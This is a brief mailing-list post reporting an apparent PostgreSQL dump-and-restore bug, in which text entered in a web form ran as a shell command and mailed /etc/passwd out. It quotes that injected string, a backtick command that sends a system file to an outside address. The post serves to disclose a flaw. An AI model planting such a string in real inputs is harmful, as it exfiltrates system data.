Short summary:
1. Someone wrote "`mail [EMAIL PROTECTED] < /etc/passwd`" in a web form;
this string was stored in a postgresql database.
2. We ran pg_dump
3. We ran psql (not the same version as pg_dump!)
4. [EMAIL PROTECTED] receives /etc/passwd
More details and the, in my opinion, somewhat reckless response by one
of the Debian postgresql package maintainers are available at:
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=285844
Thank you,
Thomer
---------------------------(end of broadcast)---------------------------
TIP 6: Have you searched our list archives?
http://archives.postgresql.org
